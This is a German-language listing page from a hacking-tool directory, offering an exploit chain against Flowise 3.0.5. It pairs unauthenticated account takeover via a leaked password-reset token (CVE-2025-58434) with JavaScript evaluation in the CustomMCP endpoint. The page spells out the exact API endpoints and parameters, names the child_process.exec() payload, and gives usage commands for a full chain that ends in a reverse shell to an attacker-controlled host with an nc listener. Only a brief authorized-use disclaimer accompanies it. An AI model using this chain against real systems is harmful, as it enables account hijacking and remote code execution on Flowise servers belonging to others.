Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-58434 — Exploit-Kette für Flowise 3.0.5: Nicht authentifizierte Übernahme von Konten durch Offenlegung von Passwort-Reset-Tokens (CVE-2025-58434), verknüpft mit CustomMCP-JavaScript-Auswertung für Remote-Code-Ausführung. | Kitploit
Tools/GitHubGitHub/r3vpwnx/cve-2025-58434
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungRed Teaming
GitHubr3vpwnx/cve-2025-58434

CVE-2025-58434

Exploit-Kette für Flowise 3.0.5: Nicht authentifizierte Übernahme von Konten durch Offenlegung von Passwort-Reset-Tokens (CVE-2025-58434), verknüpft mit CustomMCP-JavaScript-Auswertung für Remote-Code-Ausführung.

Repository anzeigen
vor 22h 42mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-58434 - Flowise-Kontoübernahme ohne Authentifizierung, verknüpft mit CustomMCP-RCE

Zwei Flowise-3.0.5-Probleme, verknüpft:

  1. CVE-2025-58434 - Offenlegung des Passwort-Reset-Tokens. POST /api/v1/account/forgot-password gibt das tempToken des Zielbenutzers direkt in der JSON-Antwort zurück. Führen Sie es POST /api/v1/account/reset-password zu, um ein bekanntes Passwort für jedes Konto festzulegen, einschließlich des ersten Admins -> vollständige Kontoübernahme ohne Authentifizierung.
  2. CustomMCP mcpServerConfig serverseitige JavaScript-Auswertung. Mit einer Sitzung und einem Workspace-API-Schlüssel (aus Schritt 1), POST /api/v1/node-load-method/customMCP mit loadMethod=listActions wertet die mcpServerConfig-Zeichenfolge als JavaScript im Flowise-Prozess aus, was -RCE ermöglicht. (Separates Flowise-Problem, das hier nur verwendet wird, um die ATO in Codeausführung umzuwandeln; zum Zeitpunkt des Schreibens wurde keine CVE zugewiesen.)
require('child_process').exec()

CVE: CVE-2025-58434

Anforderungen

root@kitploit:~
python3 -m pip install requests

Verwendung

flowise_ato_foothold.py - vollständige Kette (ATO -> API-Schlüssel -> CustomMCP-Reverse-Shell)

root@kitploit:~
python3 flowise_ato_foothold.py <LHOST> <LPORT> [TARGET_IP] [FLOWISE_VHOST]
# haben Sie `nc -lvnp <LPORT>` bereit

flowise_customMCP_rce.py - nur CustomMCP-RCE (benötigt einen API-Schlüssel)

root@kitploit:~
python3 flowise_customMCP_rce.py '<command>' '<FLOWISE_API_KEY>'

Referenzen

  • https://github.com/FlowiseAI/Flowise/security/advisories
  • NVD: CVE-2025-58434

Haftungsausschluss

Nur für autorisierte Sicherheitstests und Bildungszwecke. Führen Sie dies nur gegen Systeme aus, die Ihnen gehören oder für die Sie ausdrückliche schriftliche Genehmigung zum Testen haben.


Autor: r3vpwnx

Tool herunterladen